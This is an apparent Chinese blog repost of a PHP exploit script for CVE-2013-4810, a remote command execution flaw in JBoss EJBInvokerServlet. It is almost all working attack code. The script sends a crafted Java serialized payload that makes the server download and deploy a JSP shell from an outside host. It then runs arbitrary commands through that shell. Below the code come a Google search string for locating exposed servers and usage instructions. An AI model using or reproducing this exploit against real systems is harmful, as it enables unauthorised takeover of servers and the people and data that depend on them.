标签:
1 <?php 2 3 $host=gethostbyname($argv[1]); 4 $port=$argv[2]; 5 $cmd=$argv[3]; 6 7 8 //small jsp shell 9 //change this if you want, url to the app to be deployed, keep it short 10 $url="http://retrogod.altervista.org/a.war?"; 11 12 13 $url_len=pack("n",strlen($url)); 14 15 function hex_dump($data, $newline="\n") { 16 static $from = ‘‘; 17 static $to = ‘‘; 18 static $width = 16; static $pad = ‘.‘; 19 if ($from===‘‘) { 20 for ($i=0; $i<=0xFF; $i++) { 21 $from .= chr($i); 22 $to .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad; 23 } 24 } 25 $hex = str_split(bin2hex($data), $width*2); 26 $chars = str_split(strtr($data, $from, $to), $width); 27 $offset = 0; 28 foreach ($hex as $i => $line) { 29 echo sprintf(‘%6X‘,$offset).‘ : ‘.implode(‘ ‘, str_split($line,2)) . ‘ [‘ . $chars[$i] . ‘]‘ . $newline; 30 $offset += $width; 31 } 32 } 33 34 $frag_i= 35 "\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73". // ....sr.) org.jbos 36 "\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72". // s.invoca tion.Mar 37 "\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f". // shalledI nvocatio 38 "\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77". // n...‘A>. ....xppw 39 "\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76". // .x..G..S .sr..jav 40 "\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2". // a.lang.I nteger.. 41 "\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75". // .....8.. .I..valu 42 "\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e". // exr..jav a.lang.N 43 "\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00". // umber... ........ 44 "\x78\x70\x26\x95\xbe\x0a\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62". // xp&...sr .$org.jb 45 "\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d". // oss.invo cation.M 46 "\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc". // arshalle dValue.. 47 "\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x77"; 48 49 $frag_ii="\x00"; 50 51 $frag_iii= 52 "\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e". // .....ur. .[Ljava. 53 "\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f". // lang.Obj ect;..X. 54 "\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00". // .s)l...x p....sr. 55 "\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e". // .javax.m anagemen 56 "\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b". // t.Object Name.... 57 "\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62\x6f\x73". // .m.....x pt.!jbos 58 "\x73\x2e\x73\x79\x73\x74\x65\x6d\x3a\x73\x65\x72\x76\x69\x63\x65". // s.system :service 59 "\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f\x79\x65\x72\x78\x74\x00". // =MainDep loyerxt. 60 "\x06\x64\x65\x70\x6c\x6f\x79\x75\x71\x00\x7e\x00\x00\x00\x00\x00". // .deployu q.~..... 61 "\x01\x74". 62 $url_len. 63 $url. 64 "\x75\x72\x00". 65 "\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61". // ur..[ Ljava.la 66 "\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d". // ng.Strin g;..V... 67 "\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x10\x6a\x61". // {G...xp. ...t..ja 68 "\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67"; 69 70 $frag_iv= 71 "\x0d\xd3". 72 "\xbe\xc9\x78\x77\x04\x00\x00\x00\x01\x73\x72\x00\x22\x6f\x72\x67". // ..xw.... .sr."org 73 "\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f". // .jboss.i nvocatio 74 "\x6e\x2e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x4b\x65\x79\xb8". // n.Invoca tionKey. 75 "\xfb\x72\x84\xd7\x93\x85\xf9\x02\x00\x01\x49\x00\x07\x6f\x72\x64". // .r...... ..I..ord 76 "\x69\x6e\x61\x6c\x78\x70\x00\x00\x00\x05\x73\x71\x00\x7e\x00\x05". // inalxp.. ..sq.~.. 77 "\x77\x0d\x00\x00\x00\x05\xac\xed\x00\x05\x70\xfb\x57\xa7\xaa\x78". // w....... ..p.W..x 78 "\x77\x04\x00\x00\x00\x03\x73\x71\x00\x7e\x00\x07\x00\x00\x00\x04". // w.....sq .~...... 79 "\x73\x72\x00\x23\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e". // sr.#org. jboss.in 80 "\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61\x74". // vocation .Invocat 81 "\x69\x6f\x6e\x54\x79\x70\x65\x59\xa7\x3a\x1c\xa5\x2b\x7c\xbf\x02". // ionTypeY .:..+|.. 82 "\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00". // ..I..ord inalxp.. 83 "\x00\x01\x73\x71\x00\x7e\x00\x07\x00\x00\x00\x0a\x70\x74\x00\x0f". // ..sq.~.. ....pt.. 84 "\x4a\x4d\x58\x5f\x4f\x42\x4a\x45\x43\x54\x5f\x4e\x41\x4d\x45\x73". // JMX_OBJE CT_NAMEs 85 "\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d". // r..javax .managem 86 "\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03". // ent.Obje ctName.. 87 "\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62". // ...m.... .xpt.!jb 88 "\x6f\x73\x73\x2e\x73\x79\x73\x74\x65\x6d\x3a\x73\x65\x72\x76\x69". // oss.syst em:servi 89 "\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f\x79\x65\x72\x78". // ce=MainD eployerx 90 "\x78"; // x 91 92 $data=$frag_i.pack("v",strlen($frag_iii)+8).$frag_ii.pack("n",strlen($frag_iii)).$frag_iii.$frag_iv; 93 94 //$pk=""POST /invoker/JMXInvokerServlet/ HTTP/1.1\r\n". //the same ... 95 96 $pk="POST /invoker/EJBInvokerServlet/ HTTP/1.1\r\n". 97 "ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation\r\n". 98 "Accept-Encoding: x-gzip,x-deflate,gzip,deflate\r\n". 99 "User-Agent: Java/1.6.0_21\r\n". 100 "Host: ".$host.":".$port."\r\n". 101 "Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\n". 102 "Connection: keep-alive\r\n". 103 "Content-type: application/x-www-form-urlencoded\r\n". 104 "Content-Length: ".strlen($data)."\r\n\r\n". 105 $data; 106 //echo hex_dump($pk)."\n"; 107 $fp=fsockopen($host,$port,$e,$err,3); 108 fputs($fp,$pk); 109 $out=fread($fp,8192); 110 fclose($fp); 111 //echo hex_dump($out)."\n"; 112 113 sleep(5); 114 115 $pk="GET /a/pwn.jsp?cmd=".urlencode($cmd)." HTTP/1.0\r\n". 116 "Host: ".$host.":".$port."\r\n". 117 "Connection: Close\r\n\r\n"; 118 119 echo hex_dump($pk)."\n"; 120 $fp=fsockopen($host,$port,$e,$err,3); 121 fputs($fp,$pk); 122 $out=""; 123 while (!feof($fp)) { 124 $out.=fread($fp,8192); 125 } 126 fclose($fp); 127 echo $out; 128 ?>
#####################################################
Google 关键字: inurl:status EJBInvokerServlet
利用方法:C:\PHP>php exp.php target_ip port cmd
#####################################################
参考:http://www.hack80.com/thread-21814-1-1.html
https://www.exploit-db.com/exploits/28713/
[CVE:2013-4810]Apache Tomcat/JBoss远程命令执行
标签:
原文地址:http://www.cnblogs.com/sevck/p/4978901.html